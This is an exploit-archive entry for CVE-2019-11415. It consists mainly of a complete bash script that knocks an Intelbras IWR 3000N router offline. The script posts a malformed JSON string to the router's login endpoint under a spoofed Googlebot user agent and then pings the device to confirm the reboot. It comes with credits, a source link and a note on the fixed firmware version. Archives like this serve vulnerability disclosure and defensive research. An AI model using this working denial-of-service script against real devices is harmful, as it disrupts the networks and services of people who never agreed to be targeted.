ID

VAR-E-201904-0103

CVE

EDB ID

46768

TITLE

Intelbras IWR 3000N - Denial of Service (Remote Reboot) - Hardware dos Exploit

DESCRIPTION

Intelbras IWR 3000N - Denial of Service (Remote Reboot). CVE-2019-11415 . dos exploit for Hardware platform

AFFECTED PRODUCTS

EXPLOIT

#/bin/bash

# PoC based on CVE-2019-11415 created by Social Engineering Neo.
#
# Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/
#
# A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \""} string to v1/system/login.
#
# Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.

clear
read -p "Enter Target Address Followed by Port: " target port # localhost 8080

alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Target May be Offline or Blocking ICMP requests.
read -p "Would you Like to Proceed? (Y/n): " ans
if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then
clear
exit
fi
fi

if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' $target:$port/v1/system/login)
else
echo "Incorrect Port."
fi

clear
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Router Successfully Taken Offline. #NOTE: if router blocks ICMP requests this may be inaccurate.
else
echo Exploit Unsuccessfull, Target May Not be Vulnerable.
fi

EXPLOIT LANGUAGE

sh

PRICE

free

TYPE

Denial of Service (Remote Reboot)

TAGS

CREDITS

Social Engineering Neo

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2022-07-27T09:18:12.470000+00:00

SOURCES RELEASE DATE